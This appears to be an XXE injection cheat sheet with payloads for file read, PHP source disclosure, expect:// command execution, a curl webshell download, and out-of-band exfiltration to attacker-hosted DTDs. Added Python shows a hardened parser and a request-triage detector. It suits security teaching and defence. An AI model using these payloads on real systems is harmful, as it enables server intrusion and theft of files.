XXE
Tips
- Look for requests that send XML to the backend, ideally where the backend does not sanitise the input
- Check whether any fields from the XML are reflected on the page; those are the fields to inject into
- Check if changing the Content-Type to application/xml still works (json2xml: the backend may accept XML where it normally expects JSON)
XXEinjector
Copy an XML request from Burp, replace all of the XML except the first line (the XML declaration) with XXEINJECT, and save it as req.txt
...
Accept-Language: en-US,en;q=0.9
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT
ruby XXEinjector.rb --host=<attacker-ip> --httpport=8000 --file=/req.txt --path=/etc/passwd --oob=http --phpfilter
Detection
Check whether an entity declared in an inline DTD is expanded: if the injected field comes back as "vulnerable", the parser resolves entities
<!DOCTYPE somefield [
<!ENTITY xxe "vulnerable">
]>
&xxe;
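The detection probe above only works because the backend parser expands entities declared in the document's DTD. The following added example (not code from the original page) shows both sides: the same probe run through a default entity-expanding parser, where the field comes back as "vulnerable", and through a hardened configuration that aborts on any DOCTYPE, which is the fix to recommend to the application owner. It uses only the Python standard library expat binding; the two sample documents are constructed here.

```python
import xml.parsers.expat as expat

# Constructed sample: the detection payload from the section above, wrapped in
# a root element the way it would arrive in a request body.
DETECTION_PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE somefield [
<!ENTITY xxe "vulnerable">
]>
<somefield>&xxe;</somefield>"""

# Constructed sample: what a legitimate client sends (no DOCTYPE at all).
BENIGN_PAYLOAD = b'<?xml version="1.0" encoding="UTF-8"?><somefield>hello</somefield>'


class DtdRejected(ValueError):
    """Raised by the hardened parser when the document carries a DOCTYPE."""


def parse_field(data: bytes, forbid_dtd: bool) -> str:
    """Return the text content of the root element.

    forbid_dtd=False behaves like a default parser: entities declared in the
    document's DTD are expanded into the field value, which is exactly what
    the detection payload relies on.

    forbid_dtd=True is the hardened configuration: the parser aborts as soon
    as a DOCTYPE appears, so no entity (internal, parameter or SYSTEM) can be
    declared at all, and none of the payloads on this page can be expressed.
    """
    chunks = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append

    if forbid_dtd:
        def reject_doctype(name, sysid, pubid, has_internal_subset):
            # Raising inside an expat callback aborts Parse() with this exception.
            raise DtdRejected(f"DOCTYPE {name!r} rejected")
        parser.StartDoctypeDeclHandler = reject_doctype

    parser.Parse(data, True)
    return "".join(chunks).strip()


def probe_summary() -> dict:
    """Run both parser configurations over both samples.

    Values are the field text the application would see, or the rejection
    reason, keyed by (sample name, hardened?).
    """
    results = {}
    for label, doc in (("benign", BENIGN_PAYLOAD), ("detection", DETECTION_PAYLOAD)):
        for hardened in (False, True):
            try:
                results[(label, hardened)] = parse_field(doc, forbid_dtd=hardened)
            except DtdRejected as exc:
                results[(label, hardened)] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for (label, hardened), outcome in probe_summary().items():
        print(f"{label:10} hardened={hardened!s:5} -> {outcome}")
```

Rejecting the DOCTYPE outright is the simplest robust fix: it removes internal entities (billion laughs), SYSTEM entities (file read, wrappers) and parameter entities (the external DTD tricks in the later sections) in one setting, and a benign document still parses unchanged. Libraries such as defusedxml apply the same hook for you.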
Basic file read
<!DOCTYPE somefield [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
Read PHP files
<!DOCTYPE somefield [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
RCE (only works if the PHP expect:// wrapper is enabled, which it is not by default)
<!DOCTYPE somefield [
<!ENTITY xxe SYSTEM "expect://id">
]>
Inject a webshell
<!DOCTYPE somefield [
<!ENTITY xxe SYSTEM "expect://curl$IFS-O$IFS'<ip>/shelle.php'">
]>
CDATA exfiltration
Host this snippet as joined.dtd on an HTTP server
<!ENTITY joined "%begin;%file;%end;">
Then inject this; the CDATA wrapper keeps characters such as < and & in the file from breaking the parse
<!DOCTYPE somefield [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://<attacker-ip>:1337/joined.dtd">
%xxe;
]>
<somefield>&joined;</somefield>
Error based
- Check if sending malformed data triggers useful error messages
Host a DTD file (error.dtd) containing something like this
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % error "<!ENTITY content SYSTEM '%whatever;/%file;'>">
Then reference it from the injected DOCTYPE
<!DOCTYPE somefield [
<!ENTITY % xxe SYSTEM "http://<attacker-ip>:1337/error.dtd">
%xxe;
%error;
]>
Out of band blind exfiltration
See also DNS OOB Exfiltration.
Host a DTD file (oob.dtd) containing something like this
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY content SYSTEM 'http://<attacker-ip>:1337/?content=%file;'>">
Inject this
<!DOCTYPE somefield [
<!ENTITY % oob SYSTEM "http://<attacker-ip>:1337/oob.dtd">
%oob;
%xxe;
]>
Don't forget to reference the content entity (&content;) in the XML body: the request to the attacker host is only made when that entity is used
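Every technique on this page leaves the same fingerprints in the request body: a DOCTYPE, ENTITY declarations, SYSTEM identifiers, remote DTD URLs and PHP stream wrappers, none of which a normal API client ever sends. The following added example (not code from the original page or the XXEinjector project) is a triage check a defender can run over request bodies or WAF/application logs; it also covers the json2xml tip by flagging XML pushed at an endpoint that normally takes JSON. The sample bodies are constructed from the payloads above, and the attacker-ip placeholder is kept as written on the page.

```python
import re

# Constructs that appear in the payloads on this page. Ordinary XML sent by an
# API client never contains a DOCTYPE, so "doctype" alone already warrants a
# look; the other indicators pin down what the payload was trying to do.
INDICATORS = {
    "doctype":          re.compile(rb"<!DOCTYPE\b", re.I),
    "entity_decl":      re.compile(rb"<!ENTITY\s", re.I),
    "parameter_entity": re.compile(rb"<!ENTITY\s+%", re.I),
    "external_entity":  re.compile(rb"\bSYSTEM\s+['\"]", re.I),
    "remote_dtd":       re.compile(rb"\bSYSTEM\s+['\"]https?://", re.I),
    "file_wrapper":     re.compile(rb"file:///", re.I),
    "php_filter":       re.compile(rb"php://filter", re.I),
    "expect_wrapper":   re.compile(rb"expect://", re.I),
}

# Indicators that mean the sender was already past the detection stage.
BLOCKING = {"external_entity", "remote_dtd", "file_wrapper", "php_filter", "expect_wrapper"}

XML_CONTENT_TYPES = ("application/xml", "text/xml")

# Constructed samples, taken from the sections above.
SAMPLES = {
    "benign":    b'<?xml version="1.0"?><somefield>hello</somefield>',
    "detection": b'<!DOCTYPE somefield [<!ENTITY xxe "vulnerable">]><somefield>&xxe;</somefield>',
    "file_read": b'<!DOCTYPE somefield [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><somefield>&xxe;</somefield>',
    "oob":       b'<!DOCTYPE somefield [<!ENTITY % oob SYSTEM "http://<attacker-ip>:1337/oob.dtd"> %oob; %xxe;]>'
                 b'<somefield>&content;</somefield>',
}


def xxe_indicators(body: bytes) -> set:
    """Names of every indicator present in a request body."""
    return {name for name, rx in INDICATORS.items() if rx.search(body)}


def assess_request(content_type: str, body: bytes, endpoint_accepts_xml: bool) -> dict:
    """Triage one request.

    Verdicts:
      block  - a DTD that declares external entities or uses a stream wrapper
      review - a DTD with only internal entities (the detection probe), or XML
               sent to an endpoint that normally takes JSON (the json2xml tip)
      ok     - nothing XXE-related
    """
    found = xxe_indicators(body)
    ct_is_xml = content_type.split(";")[0].strip().lower() in XML_CONTENT_TYPES
    unexpected_xml = ct_is_xml and not endpoint_accepts_xml
    if found & BLOCKING:
        verdict = "block"
    elif found or unexpected_xml:
        verdict = "review"
    else:
        verdict = "ok"
    return {"verdict": verdict, "indicators": sorted(found), "unexpected_xml": unexpected_xml}


def triage_all(endpoint_accepts_xml: bool = True) -> dict:
    """Assess every constructed sample as if sent with Content-Type: application/xml."""
    return {name: assess_request("application/xml", body, endpoint_accepts_xml)
            for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, result in triage_all().items():
        print(f"{name:10} {result['verdict']:7} {', '.join(result['indicators'])}")
```

The "review" tier is where the detection probe lands: it proves nothing was read, but a DOCTYPE in traffic from a client that has no business sending one is the earliest signal that someone is testing the parser, and correlating it with a later outbound DTD fetch from the server (the remote_dtd indicator, or an egress log entry to port 1337) turns it into a confirmed exploitation attempt.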